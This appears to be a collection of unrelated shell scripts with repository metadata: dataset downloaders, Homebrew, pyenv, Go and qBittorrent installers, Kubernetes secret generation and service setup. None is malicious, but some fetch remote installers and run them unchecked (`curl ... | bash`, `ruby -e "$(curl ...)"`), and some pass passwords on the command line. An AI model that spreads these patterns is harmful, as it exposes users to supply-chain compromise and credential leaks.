else
	# ID-based export: dump IDs and seq/qual separately, sort both by the
	# order column, then let the FASTQ_EXPORT binary merge them.
	php FASTQ_ID_EXPORT.php "$FASTQ_COL" > BEFORE_SORT_ID.txt
	php SAM_SEQ_QUAL_EXPORT.php "$F_OR_P" > BEFORE_SORT_SEQ_QUAL.txt
	sort -k1,1 -n BEFORE_SORT_ID.txt | cut -f 2- > AFTER_SORT_ID.txt
	sort -k1,1 -n BEFORE_SORT_SEQ_QUAL.txt | cut -f 2- > AFTER_SORT_SEQ_QUAL.txt
	./FASTQ_EXPORT "$2"
fi
| true
|
e755fa4c3fccb7e74af12704d51c4358764ae3b8
|
Shell
|
Cris140/vc_tacotron
|
/download_data.sh
|
UTF-8
| 1,364
| 2.9375
| 3
|
[
"MIT",
"CC-BY-3.0",
"CC-BY-4.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
#!/bin/bash
# Download two CMU ARCTIC voices (bdl, clb), prefix each wav with its speaker
# name, copy them into parallel_data/wavs, and build test.lst + metadata.csv.

#download dataset
wget http://festvox.org/cmu_arctic/cmu_arctic/packed/cmu_us_bdl_arctic-0.95-release.zip -P /tmp
wget http://festvox.org/cmu_arctic/cmu_arctic/packed/cmu_us_clb_arctic-0.95-release.zip -P /tmp
# wget http://festvox.org/cmu_arctic/cmu_arctic/packed/cmu_us_rms_arctic-0.95-release.zip -P /tmp
# wget http://festvox.org/cmu_arctic/cmu_arctic/packed/cmu_us_slt_arctic-0.95-release.zip -P /tmp

#unzip
unzip -q /tmp/cmu_us_bdl_arctic-0.95-release.zip -d /tmp/bdl
unzip -q /tmp/cmu_us_clb_arctic-0.95-release.zip -d /tmp/clb
# unzip -q /tmp/cmu_us_rms_arctic-0.95-release.zip -d /tmp/rms
# unzip -q /tmp/cmu_us_slt_arctic-0.95-release.zip -d /tmp/slt

repo=$PWD

# process bdl — glob instead of `ls` so unusual filenames cannot break the loop
cd /tmp/bdl/cmu_us_bdl_arctic/wav
for f in *; do
    mv -- "$f" "bdl_$f"
done

# process clb
cd /tmp/clb/cmu_us_clb_arctic/wav
for f in *; do
    mv -- "$f" "clb_$f"
done

# return repo dir
cd "$repo"

cp "/tmp/clb/cmu_us_clb_arctic/wav/"* "parallel_data/wavs/"
cp "/tmp/bdl/cmu_us_bdl_arctic/wav/"* "parallel_data/wavs/"

# First 100 clb files become the test set; the rest form source/target pairs.
ls "parallel_data/wavs"|grep "clb"|tail -n +101|sort > /tmp/source.txt
ls "parallel_data/wavs"|grep "bdl"|tail -n +101|sort > /tmp/target.txt
ls "parallel_data/wavs"|grep "clb"|head -n 100|sort > "parallel_data/test.lst"
paste -d\| /tmp/source.txt /tmp/target.txt > "parallel_data/metadata.csv"
| true
|
f4f053e8d8ad83d6f40e640222071d8417129b30
|
Shell
|
trauts/psycho
|
/doc/example5/0.read_me
|
UTF-8
| 364
| 2.65625
| 3
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#! /bin/sh
# Configuration for example 5: sets the experiment dimensions used by the
# numbered pipeline scripts below (source this, then run 1..5 in order).
export MATS=8
export ITEMS=1
export SETS=16
# run each file in numerical order - ie
# 1.check_me
#    check the materials
# 2.latin_me
#    latin square them
# 3.random_me
#    randomise the latin squares
# 4.output_me
#    you now have an output directory containing booklets (well, almost)
#
# 5.tidy_me
#    delete everything except the materials, of course
| true
|
8280add7e96e2cd1dda2edba5c12a0f31f5aca5a
|
Shell
|
bhartiroshan/om
|
/scripts/downloads.sh
|
UTF-8
| 130
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# download_mms URL FOLDER
# Fetch a tarball from URL and save it as "<FOLDER>.tar.gz".
download_mms(){
    local download_url=$1
    local mms_folder=$2
    # BUGFIX: the original referenced the misspelled, unset $DOWNLOAD_URL
    # (the local was named DOWNLOADURL), so curl was never given a URL.
    # Expansions are quoted so URLs/paths with special characters survive.
    curl --output "${mms_folder}.tar.gz" "$download_url"
}
| true
|
68ec8e65ccbbd6ece5cb7e9b73eac1ba6f18b018
|
Shell
|
timoguin/shell-functions
|
/source-all.sh
|
UTF-8
| 406
| 3.578125
| 4
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
# =============================================================================
# Sources all functions
# =============================================================================
echo "Sourcing all functions"
for func in **/*.sh; do
  # BUGFIX: reset the flag each iteration — the original never cleared $err,
  # so after one failure every later file was reported as failed too.
  err=false
  . "$func" || err=true
  if [ "$err" = "true" ]; then
    # BUGFIX: report $func; the original printed the unset variable $script.
    echo "Sourcing failed: $func" 1>&2
    continue
  fi
  echo "Sourced function: $func"
done
| true
|
8e6bc90ca7f09d08779df049dafd88e7454dccd1
|
Shell
|
guillaumerosinosky/harness
|
/it/header.sh
|
UTF-8
| 450
| 2.765625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Shared ANSI colour codes for test output. Values are literal "\033[..."
# sequences, intended to be interpreted later via `echo -e` / `printf %b`.

NC='\033[0m'        # reset / no colour
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
BLUE='\033[0;34m'
PURPLE='\033[0;35m'
CYAN='\033[0;36m'
WHITE='\033[0;37m'

# Horizontal rule, plus pre-coloured green/red variants.
LINE='=================================================================='
GLINE="${GREEN}${LINE}${NC}"
RLINE="${RED}${LINE}${NC}"
| true
|
9fce944749b9d1d1dbc64f579d5d988fff01bab9
|
Shell
|
TheUCoin/theucoin
|
/contrib/init/theucoind.init
|
UTF-8
| 1,309
| 3.65625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# theucoind The TheUCoin core server.
#
#
# chkconfig: 345 80 20
# description: theucoind
# processname: theucoind
#
# SysV init script (RHEL/CentOS style) — relies on the daemon/killproc/status
# helpers from /etc/init.d/functions.

# Source function library.
. /etc/init.d/functions

# you can override defaults in /etc/sysconfig/theucoind, see below
if [ -f /etc/sysconfig/theucoind ]; then
    . /etc/sysconfig/theucoind
fi

RETVAL=0

prog=theucoind

# you can override the lockfile via TUCOIND_LOCKFILE in /etc/sysconfig/theucoind
lockfile=${TUCOIND_LOCKFILE-/var/lock/subsys/theucoind}

# theucoind defaults to /usr/bin/theucoind, override with TUCOIND_BIN
tucoind=${TUCOIND_BIN-/usr/bin/theucoind}

# theucoind opts default to -disablewallet, override with TUCOIND_OPTS
tucoind_opts=${TUCOIND_OPTS}

# Launch the daemon via the RHEL daemon() helper and record a subsys lock
# file on success (so `service --status-all` / shutdown ordering work).
start() {
    echo -n $"Starting $prog: "
    daemon $DAEMONOPTS $tucoind $tucoind_opts
    RETVAL=$?
    echo
    [ $RETVAL -eq 0 ] && touch $lockfile
    return $RETVAL
}

# Terminate the daemon with killproc and clear the lock file on success.
stop() {
    echo -n $"Stopping $prog: "
    killproc $prog
    RETVAL=$?
    echo
    [ $RETVAL -eq 0 ] && rm -f $lockfile
    return $RETVAL
}

# Standard SysV entry points.
case "$1" in
    start)
        start
        ;;
    stop)
        stop
        ;;
    status)
        status $prog
        ;;
    restart)
        stop
        start
        ;;
    *)
        echo "Usage: service $prog {start|stop|status|restart}"
        exit 1
        ;;
esac
| true
|
fb7ff7e7f683d988ad209d37cc0eea569afa9fc2
|
Shell
|
oneKelvinSmith/homesick-dotfiles
|
/home/.brew
|
UTF-8
| 932
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
# Install Homebrew if missing, add taps, and install a standard package set.
# BUGFIX: the original shebang was `#! /bin/sh -x` while the script uses a
# bash array — run it under bash explicitly and enable tracing via `set`.
set -x

# Check for Homebrew,
# Install if we don't have it
# (`command -v` replaces the fragile `test ! $(which brew)` idiom, which only
# worked by accident when `which` printed nothing.)
if ! command -v brew >/dev/null 2>&1; then
  echo "Installing homebrew..."
  ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
fi

# Update homebrew recipes
brew update

# Tap casks for betas, etc
brew tap caskroom/cask
brew tap caskroom/versions
brew tap homebrew/science

binaries=(
  axel
  bash
  brew-cask
  coreutils
  leiningen
  elixir
  erlang
  findutils
  fish
  gcc
  git
  gnutls
  hub
  htop
  imagemagick
  node
  parallel
  phantomjs
  postgresql
  python
  python3
  r
  rbenv
  readline
  reattach-to-user-namespace
  redis
  ruby-build
  sbt
  scala
  sqlite
  the_silver_searcher
  tig
  tmux
  tree
  vim
  watch
  wemux
  wget
  zsh
)

echo "installing binaries…"
# Quote the expansion so no element is glob-expanded or re-split.
brew install "${binaries[@]}"

# Install emacs with its peculiarities
brew install emacs --HEAD --use-git-head --cocoa --with-gnutls --with-imagemagick
| true
|
ad40ea1200aa3f29083c120677b21ce2c7a298d2
|
Shell
|
gtcno/opendistro-elasticsearch
|
/scripts/generate_kubernetes_secrets.sh
|
UTF-8
| 1,190
| 2.984375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Render and apply the Kubernetes secrets for an OpenDistro-for-Elasticsearch
# helm release: TLS certs, hashed admin password, Kibana and exporter creds.
#   $1 - kubernetes namespace   $2 - helm release name   $3 - plaintext password
set -e
SCRIPTPATH=$(dirname "$(realpath -s "$0")")
cd "$SCRIPTPATH/.."

# Fail fast with a usage hint if any argument is missing (the original
# silently proceeded with empty values).
NAMESPACE=${1:?"usage: $0 <namespace> <release-name> <password>"}
RELEASE_NAME=${2:?"usage: $0 <namespace> <release-name> <password>"}
PASSWORD=${3:?"usage: $0 <namespace> <release-name> <password>"}

# Hash the password with the opendistro security tool inside the stock image.
# All expansions are quoted so passwords containing spaces/globs survive.
HASH=$(docker run amazon/opendistro-for-elasticsearch sh /usr/share/elasticsearch/plugins/opendistro_security/tools/hash.sh -p "$PASSWORD")

echo "generate kubernetes secret for $RELEASE_NAME certificates"
helm template "$RELEASE_NAME" --set odfe.generate_secrets=true --show-only templates/odfe-cert-secrets.yaml . | kubectl apply -n "$NAMESPACE" -f -

echo "encrypting password"
echo "generate kubernetes secret for certificates"
helm template "$RELEASE_NAME" --set odfe.generate_secrets=true --set odfe.security.password.hash="$HASH" --show-only templates/odfe-config-secrets.yaml . | kubectl apply -n "$NAMESPACE" -f -

echo "generating secret for kibana"
helm template "$RELEASE_NAME" --set odfe.generate_secrets=true --set kibana.password="$PASSWORD" --show-only templates/odfe-kibana-secrets.yaml . | kubectl apply -n "$NAMESPACE" -f -

echo "generating secret for exporter"
helm template "$RELEASE_NAME" --set odfe.generate_secrets=true --set exporter.password="$PASSWORD" --show-only templates/odfe-prometheus-exporter-secrets.yaml . | kubectl apply -n "$NAMESPACE" -f -
| true
|
b43ada34ff77bc70a7763256d389c2cc27c11f8e
|
Shell
|
alisw/alidist
|
/openloops.sh
|
UTF-8
| 1,339
| 3.125
| 3
|
[] |
no_license
|
package: Openloops
version: "%(tag_basename)s"
tag: "OpenLoops-2.1.2"
source: https://gitlab.com/openloops/OpenLoops.git
requires:
  - "GCC-Toolchain:(?!osx)"
  - "Python:(?!osx)"
  - "Python-modules:(?!osx)"
  - "Python-system:(osx.*)"
build_requires:
  - alibuild-recipe-tools
---
#!/bin/bash -e
# alidist build recipe body: copy sources, build OpenLoops + selected process
# libraries, install, and emit an environment modulefile.
rsync -a --delete --exclude '**/.git' --delete-excluded "$SOURCEDIR/" .
unset HTTP_PROXY # unset this to build on slc6 system
# Due to typical long install dir paths used by aliBuild, the string lengths must be increased
sed -i -e 's/max_string_length\ =\ 255/max_string_length\ =\ 1000/g' pyol/config/default.cfg
./scons
# Throttle process-library builds to ~1/5 of the requested parallel jobs,
# with a floor of 1 — presumably to limit peak memory; TODO confirm.
JOBS=$((${JOBS:-1}*1/5))
[[ $JOBS -gt 0 ]] || JOBS=1
# Auto-generate the pp->jets process libraries (QCD, EW, nf5 variants).
for proc in ppjj ppjj_ew ppjjj ppjjj_ew ppjjj_nf5 ppjjjj; do
  ./scons --jobs="$JOBS" "auto=$proc"
done
for inst in examples include lib openloops proclib pyol; do
  cp -r "$inst" "$INSTALLROOT/"
done
#ModuleFile
mkdir -p etc/modulefiles
alibuild-generate-module --bin --lib > "etc/modulefiles/$PKGNAME"
# Append OpenLoops-specific environment to the generated modulefile
# (the "\$" escapes keep Tcl variables literal in the heredoc).
cat >> "etc/modulefiles/$PKGNAME" <<EoF
# Our environment
set OPENLOOPS_ROOT \$::env(BASEDIR)/$PKGNAME/\$version
setenv OPENLOOPS_ROOT \$OPENLOOPS_ROOT
setenv OpenLoopsPath \$OPENLOOPS_ROOT
prepend-path LD_LIBRARY_PATH \$OPENLOOPS_ROOT/proclib
EoF
mkdir -p "$INSTALLROOT/etc/modulefiles"
rsync -a --delete etc/modulefiles/ "$INSTALLROOT/etc/modulefiles"
| true
|
c84edbbbf9eee0cd2407ba9e04c556540df0b96d
|
Shell
|
unoexperto/nginx-docker-images
|
/transmission-seedbox/docker/scripts/static-configuration.sh
|
UTF-8
| 796
| 2.6875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# One-time static configuration for the transmission-seedbox image:
# Apache vhost, SFTP, and Transmission directories/log.

# Apache
###############################################################################

# Set configuration — replace any enabled sites with the bundled vhost.
rm -f /etc/apache2/sites-enabled/*
cp /docker/configurations/web.conf /etc/apache2/sites-available
ln -s /etc/apache2/sites-available/web.conf /etc/apache2/sites-enabled/web.conf

# Activate htaccess modules (group-file based authorization)
a2enmod authz_groupfile

# SFTP
###############################################################################

# Add configuration for SFTP
cp /docker/configurations/sshd_config /etc/ssh/sshd_config

# Add SFTP group (sshd_config presumably chroots members of this group —
# verify against the bundled sshd_config)
addgroup sftp

# Transmission
###############################################################################

# Create directories
mkdir -p /data/configuration/torrents
mkdir -p /data/downloads

# Create file log
touch /var/log/transmission.log
| true
|
53e541c621e8f9383b88dd43b44961e8916a14ea
|
Shell
|
sijiaoh/dotfiles
|
/lib/brew_path.sh
|
UTF-8
| 312
| 3.078125
| 3
|
[] |
no_license
|
# Prepend Homebrew (macOS) or Linuxbrew paths for the detected OS.
# Relies on lib/os.sh to set $OS ("linux" or otherwise).
. "${DOTFILES_ROOT}/lib/os.sh"

# Quote ${OS}: the original unquoted `test ${OS} = 'linux'` produced a syntax
# error whenever OS was unset or empty.
if [ "${OS}" = 'linux' ]; then
    export PATH="/home/linuxbrew/.linuxbrew/bin:${PATH}"
    export MANPATH="/home/linuxbrew/.linuxbrew/share/man:${MANPATH:-""}"
    export INFOPATH="/home/linuxbrew/.linuxbrew/share/info:${INFOPATH:-""}"
else
    # macOS: let brew emit its own PATH/MANPATH/INFOPATH exports.
    eval "$(/opt/homebrew/bin/brew shellenv)"
fi
| true
|
281a27086b4d60eddb231e9fa25da2a7306a0580
|
Shell
|
zdrazil/my-preferences
|
/.zshrc
|
UTF-8
| 3,736
| 2.828125
| 3
|
[] |
no_license
|
# Interactive zsh configuration: shared rc files, brew/asdf setup, prompt with
# git info, completion tuning, keybindings, and self-bootstrapping plugins.

# allow shortcut ctrl-W to delete parts of path only
# e.g. a/b/c + ctrl-W -> results in a/b
autoload -U select-word-style
select-word-style bash

autoload -Uz compinit
compinit

# Shared (bash-compatible) rc fragments.
if [ -f "$HOME/.config/bash-like/commonrc" ]; then
  . "$HOME/.config/bash-like/commonrc"
fi

if [ -f "$MY_CONFIG_HOME/bash-like/append_paths" ]; then
  . "$MY_CONFIG_HOME/bash-like/append_paths"
fi

# Homebrew completions and asdf version manager (paths differ per platform).
HOMEBREW_PREFIX=$(brew --prefix)
if type brew &>/dev/null; then
  FPATH="$HOMEBREW_PREFIX"/share/zsh-completions:$FPATH
fi

if [ -f "$HOMEBREW_PREFIX/opt/asdf/libexec/asdf.sh" ]; then
  . "$HOMEBREW_PREFIX/opt/asdf/libexec/asdf.sh"
fi

if [ -f "/opt/local/share/asdf/asdf.sh" ]; then
  . /opt/local/share/asdf/asdf.sh
fi

# . $HOME/.asdf/asdf.sh

fpath=(${ASDF_DIR}/completions $fpath)

# ---------------------------------------------------

# used %{...%} to prevent jumping text when writing
# export PROMPT="·%n@%m %{$fg[reset_color]%}%1~%{$reset_color%}> "
# http://zsh.sourceforge.net/Doc/Release/Prompt-Expansion.html
# Left prompt: job count (if any), last exit status (if non-zero), cwd tail.
export PROMPT="·%(1j.[%j].)%(0?..%?) %1~ > "

# Git in prompt — vcs_info refreshed before every prompt, branch shown on the
# right-hand side.
autoload -Uz vcs_info
zstyle ':vcs_info*' formats "%b"
setopt prompt_subst
precmd() { vcs_info }
export RPROMPT='${vcs_info_msg_0_}'

setopt AUTO_MENU # Show completion menu on a successive tab press.
setopt INC_APPEND_HISTORY # Write to the history file immediately, not when the shell exits.
setopt HIST_FIND_NO_DUPS # Do not display a previously found event.
setopt HIST_IGNORE_SPACE # Do not record an event starting with a space.
setopt HIST_VERIFY # Do not execute immediately upon history expansion.
setopt HIST_EXPIRE_DUPS_FIRST # Expire duplicate entries first when trimming history.
setopt NO_LIST_BEEP
setopt AUTO_CD

# Emacs-style line editing.
bindkey -e

zstyle ':completion:*' rehash true

# Use caching to make completion for commands such as dpkg and apt usable.
zstyle ':completion::complete:*' use-cache on
zstyle ':completion::complete:*' cache-path "${ZDOTDIR:-$HOME}/.zcompcache"

# Case-insensitive (all), partial-word, and then substring completion.
zstyle ':completion:*' matcher-list 'm:{a-zA-Z}={A-Za-z}' 'r:|[._-]=* r:|=*' 'l:|=* r:|=*'

# Group matches and describe.
zstyle ':completion:*:*:*:*:*' menu select

# Don't complete unavailable commands.
zstyle ':completion:*:functions' ignored-patterns '(_*|pre(cmd|exec))'

# History
zstyle ':completion:*:history-words' remove-all-dups yes

unsetopt CASE_GLOB

# ------------------ Custom Settings ------------------

# Substring keybindings (bound only if the prompt framework exported key_info).
if [[ -n "$key_info" ]]; then
  # Emacs
  bindkey -M emacs "$key_info[Control]P" history-substring-search-up
  bindkey -M emacs "$key_info[Control]N" history-substring-search-down

  # Emacs and Vi
  for keymap in 'emacs' 'viins'; do
    bindkey -M "$keymap" "$key_info[Up]" history-substring-search-up
    bindkey -M "$keymap" "$key_info[Down]" history-substring-search-down
  done
fi

# Ctrl-X Ctrl-E: edit the current command line in $EDITOR.
autoload -z edit-command-line
zle -N edit-command-line
bindkey "^X^E" edit-command-line

[ -f "$HOME/.fzf.zsh" ] && source "$HOME/.fzf.zsh"

export ZSH_AUTOSUGGEST_STRATEGY=(history completion)

eval "$(direnv hook zsh)"

# ------------------ PLUGINS ----------------------
# Self-bootstrapping plugin manager: clone zsh_unplugged once, then load repos.
ZPLUGINDIR="$HOME/.config/zsh/plugins"
if [[ ! -d "$ZPLUGINDIR/zsh_unplugged" ]]; then
  git clone --quiet https://github.com/mattmc3/zsh_unplugged "$ZPLUGINDIR/zsh_unplugged"
fi
source "$ZPLUGINDIR/zsh_unplugged/zsh_unplugged.plugin.zsh"

repos=(
  agkozak/zsh-z
  zsh-users/zsh-completions
  zsh-users/zsh-autosuggestions
  Aloxaf/fzf-tab
  zsh-users/zsh-syntax-highlighting
  zsh-users/zsh-history-substring-search
)
plugin-load $repos

test -e "${HOME}/.iterm2_shell_integration.zsh" && source "${HOME}/.iterm2_shell_integration.zsh"
| true
|
718e47a85ca57173af00df225855d88251f9593d
|
Shell
|
rzygler/old-sysadmin-scripts
|
/mysql/export/export_db_tables.sh
|
UTF-8
| 594
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
###
### Dump table structure and data
###
### @author Rich Zygler
###
### Reads one-or-more table names per line from $DATA_FILE and dumps them
### from the configured database into $OUT_FILE.

### vars to hold program locations
PROG_CAT="/bin/cat"
PROG_DATE="/bin/date"
PROG_MYSQLDUMP="/usr/bin/mysqldump"

### other vars
DATA_FILE="/home/rzygler/scripts/db_tables_to_export.txt"
OUT_FILE="/home/rzygler/scripts/export.sql"

### fill these in for the database we are dumping from
DB=""
USERNAME=""
PASSWORD=""
HOST=""

###
TABLES=""
# Read the table list directly (the original `for line in $(cat ...)` forked
# cat and word-split the whole file). Word-splitting each line is kept on
# purpose: every whitespace-separated token is a table name.
while IFS= read -r line; do
  for t in $line; do
    TABLES="${TABLES} ${t}"
  done
done < "$DATA_FILE"

# --no-data
# NOTE: passing the password on the command line is visible in `ps`; prefer a
# ~/.my.cnf or --defaults-extra-file for anything multi-user.
# $TABLES is intentionally unquoted so each table becomes its own argument.
$PROG_MYSQLDUMP -u "$USERNAME" -p"${PASSWORD}" -h "$HOST" "$DB" $TABLES > "$OUT_FILE"
| true
|
189aa40ba9e2b98754b59be2e6a5af83d43037ab
|
Shell
|
wasuaje/clasideu
|
/micrositios/hdl_micrositios2.sh
|
UTF-8
| 2,602
| 4.21875
| 4
|
[] |
no_license
|
#!/bin/bash
# Arguments = -p project -m microsite -a action  [A]ctivate | [D]eactivate
# To work with microsites use:  hdl_micrositios -m microsite -a A  (to activate) or
#                               hdl_micrositios -m microsite -a D  (to deactivate)
#
# To work with projects use:    hdl_micrositios -m microsite -p project -a A  (to activate) or
#                               hdl_micrositios -m microsite -a D  (to deactivate)
#
# NOTE(review): action "A" *appends* a RewriteRule that redirects the
# microsite/project away, while "D" removes that rule — the naming looks
# inverted relative to "activate"; confirm intent with the Apache config.

# Standard text shown for the help option or when the parameters are wrong
usage()
{
cat << EOF
Utilizacion: $0 opciones

Este script automatiza el proceso de activar/desactivar proyectos y micrositios.

OPTIONS:
   -h      Muestra este mensaje
   -p      Proyecto
   -m      Micrositio
   -a      Accion a realizar solo acepta A o D
EOF
}

PROYECTO=
MICROSITIO=
ACCION=
while getopts "hp:m:a:" OPTION
do
    case $OPTION in
        h)
            usage
            exit 1
            ;;
        p)
            PROYECTO=$OPTARG
            ;;
        m)
            MICROSITIO=$OPTARG
            ;;
        a)
            ACCION=$OPTARG
            ;;
        ?)
            usage
            exit
            ;;
    esac
done

# there must always be at least a microsite and an action to perform
if [[ -z $MICROSITIO ]] || [[ -z $ACCION ]]
then
    usage
    exit 1
fi

# implicitly, passing both a project and a microsite means we edit the projects file
if [[ ! -z $PROYECTO ]] && [[ ! -z $MICROSITIO ]]
then
    if [ $ACCION = A ] # if activating
    then
        echo "RewriteRule ^/micrositio/$MICROSITIO/$PROYECTO.*$ http://clasificados.eluniversal.com/inmuebles/nuevosproyectos.shtml [R,L]" >> proyectosInactivos.conf
    fi
    if [ $ACCION = D ] # if deactivating
    then
        # delete the matching rule, keeping a .bkp of the previous file
        sed /$MICROSITIO.*$PROYECTO/d proyectosInactivos.conf > proyectosInactivos.conf.tmp
        mv proyectosInactivos.conf proyectosInactivos.conf.bkp
        mv proyectosInactivos.conf.tmp proyectosInactivos.conf
    fi
fi

# if the project is empty and the microsite is not, we edit the microsites file
if [[ -z $PROYECTO ]] && [[ ! -z $MICROSITIO ]]
then
    if [ $ACCION = A ] # if activating
    then
        echo "RewriteRule ^/micrositio/$MICROSITIO/.*$ http://clasificados.eluniversal.com/inmuebles/micrositios.shtml [R,L]" >> micrositiosInactivos.conf
    fi
    if [ $ACCION = D ] # if deactivating
    then
        sed /$MICROSITIO/d micrositiosInactivos.conf > micrositiosInactivos.conf.tmp
        mv micrositiosInactivos.conf micrositiosInactivos.conf.bkp
        mv micrositiosInactivos.conf.tmp micrositiosInactivos.conf
    fi
fi
| true
|
f831f4fed5285f3f005550089337ce2743c48ce8
|
Shell
|
cdelimitrou/charmander
|
/bin/invm/deploy_scheduler.sh
|
UTF-8
| 603
| 3.078125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Build and (re)deploy the charmander-scheduler binary, managed by upstart.
# BUGFIX: the original shebang was "#/bin/bash" (missing '!'), so the kernel
# never honored it and the script ran under whatever shell invoked it.
set -e

DIR=$PWD
UPSTART=/etc/init/charmander-scheduler.conf

export PATH=$PATH:/usr/local/go/bin
export GOPATH=$DIR

# Stop a running scheduler before replacing its binary.
if [ -e "$UPSTART" ]; then
    if initctl status charmander-scheduler | grep -q start; then
        initctl stop charmander-scheduler
    fi
fi

go get -u github.com/att-innovate/charmander-scheduler
go install -a github.com/att-innovate/charmander-scheduler
cp "$DIR/bin/charmander-scheduler" /usr/local/bin/

# Install the upstart job on first deploy, then (re)start the service.
if [ -e "$UPSTART" ]; then
    initctl start charmander-scheduler
else
    cp /vagrant/bin/invm/charmander-scheduler.conf /etc/init/
    initctl start charmander-scheduler
fi
| true
|
ddfdcea217c703c49ca05049a1d6f6c7fca9e65f
|
Shell
|
swiftycloud/swifty
|
/deps.sh
|
UTF-8
| 1,945
| 2.859375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Populate the vendor/ GOPATH with pinned dependencies (k8s client-go 6.0.0
# with a compatible protobuf, plus the rest via `go get`).

# Guard: the caller must have set the two-element GOPATH this script assumes.
if [ "x${GOPATH}" != "x$(pwd)/vendor:$(pwd)" ]; then
	echo "Set GOPATH to $(pwd)/vendor:$(pwd)"
	exit 1
fi

VGOPATH="$(pwd)/vendor"
# Idempotence: skip everything if vendor/ was already populated.
if [ -d "${VGOPATH}/src" ]; then
	echo "Vendor is populated"
	exit 0
fi

set -x
set -e

# We need 6.0.0 version of the k8s client libs. When built, the lib
# gets the protobuf library of some given version, which is SUDDENLY
# incompatible with prometheus client lib. The latter need protobuf
# of version 1.1.0. Thus, we first download the k8s, then checkout
# it to 6.0.0, then fetch the Godep-s of it, then fiv protobuf version
# to be 1.1.1, then install k8s, then proceed with the rest.

# Install build prerequisites with whichever package manager exists.
if which yum ; then
	yum install -y golang patch librados2-devel glibc-headers glibc-static
	yum groupinstall -y "Development Libraries"
elif which apt-get ; then
	apt-get install -y golang librados-dev
fi

go get github.com/tools/godep
if [ "x$USER" = "xroot" ] ; then
	cp ${VGOPATH}/bin/godep /usr/bin
else
	# Unusual but valid sh: `case WORD` on one line, `in PATTERN)` on the
	# next. The surrounding colons make substring-matching $PATH exact.
	case :$PATH: # notice colons around the value
	in *:$HOME/bin:*) ;; # do nothing, it's there
	*) echo "$HOME/bin not in $PATH" >&2; exit 0 ;;
	esac
	cp ${VGOPATH}/bin/godep $HOME/bin
fi

# Pin client-go to v6.0.0 and protobuf to v1.1.0 before installing (see the
# compatibility note above).
go get -d k8s.io/client-go/...
cd ${VGOPATH}/src/k8s.io/client-go
git checkout -b swy6.0.0 v6.0.0
godep restore ./...
cd -
git -C ${VGOPATH}/src/github.com/golang/protobuf checkout -b swy1.1.0 v1.1.0
go install k8s.io/client-go/...

# Remaining dependencies.
go get github.com/prometheus/client_golang/prometheus
go get github.com/go-sql-driver/mysql
go get github.com/gorilla/mux
go get github.com/gorilla/websocket
go get gopkg.in/yaml.v2
go get github.com/michaelklishin/rabbit-hole
go get github.com/streadway/amqp
go get go.uber.org/zap
go get gopkg.in/mgo.v2
# cron.v2 needs a local patch before install.
go get -d gopkg.in/robfig/cron.v2;
patch -d${VGOPATH}/src/gopkg.in/robfig/cron.v2 -p1 < $(pwd)/contrib/robfig-cron.patch;
go install gopkg.in/robfig/cron.v2
go get code.cloudfoundry.org/bytefmt
go get github.com/ceph/go-ceph/rados # this gent is broken in deb, so last
| true
|
d6260124516be41fbf32d10bbe5efc3981de07ac
|
Shell
|
jimscratch/linux-comfy-chair
|
/modules/python.sh
|
UTF-8
| 1,630
| 3.046875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# python.sh
# next install python (both 2.x and 3.x trees) using Pyenv
# will probably stop installing python2 in the near future as it is EOL.
# NOTE: piping curl to bash executes a remote script; pin/inspect it if this
# machine needs stronger supply-chain guarantees.
curl -L https://raw.githubusercontent.com/pyenv/pyenv-installer/master/bin/pyenv-installer | bash

# install a couple of plugins...
# BUGFIX: GitHub permanently disabled the unauthenticated git:// protocol in
# March 2022, so the first clone below failed; use https like the others.
git clone https://github.com/yyuu/pyenv-pip-migrate.git ~/.pyenv/plugins/pyenv-pip-migrate
git clone https://github.com/yyuu/pyenv-ccache.git ~/.pyenv/plugins/pyenv-ccache
git clone https://github.com/jawshooah/pyenv-default-packages.git ~/.pyenv/plugins/pyenv-default-packages

# set up a default-packages file for python libraries to install with each new python or venv ...
# for now, just a few that allow my vscode settings to work easier.
echo $'wheel\npylint\nblack\nflake8\n' > ~/.pyenv/default-packages

if ! grep -qc 'pyenv init' ~/.bashrc ; then
    echo "## Adding pyenv to .bashrc ##"
    echo >> ~/.bashrc
    echo "# Set up Pyenv" >> ~/.bashrc
    echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
    echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
    echo 'eval "$(pyenv init --path)"' >> ~/.bashrc
    echo 'eval "$(pyenv init -)"' >> ~/.bashrc
    echo 'eval "$(pyenv virtualenv-init -)"' >> ~/.bashrc
fi

# run the above locally to use in this shell
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init --path)"
eval "$(pyenv init -)"

pyenv install 2.7.18
pyenv install 3.9.6
# 'python' and 'python3' target 3.9.6 while 'python2' targets 2.7.18
pyenv global 3.9.6 2.7.18

# now update 'pip' in both versions ...
python2 -m pip install --upgrade pip
python3 -m pip install --upgrade pip
| true
|
1ace00c792592afc094ed20dca41826eaf521edf
|
Shell
|
abenxiang/vpstoolbox_clone
|
/install/qbt-origin.sh
|
UTF-8
| 1,516
| 2.953125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
## qBittorrent (upstream build) module
# Installs qbittorrent-nox, writes a systemd unit, and prepares its
# profile/download/GeoIP directory tree under /usr/share/nginx.
install_qbt_o(){
    set +e
    clear
    TERM=ansi whiptail --title "安装中" --infobox "安装Qbt原版中..." 7 68
    colorEcho ${INFO} "安装原版Qbittorrent(Install Qbittorrent ing)"
    # Debian ships qbittorrent-nox directly; Ubuntu needs the upstream PPA.
    if [[ ${dist} == debian ]]; then
        apt-get update
        apt-get install qbittorrent-nox -y
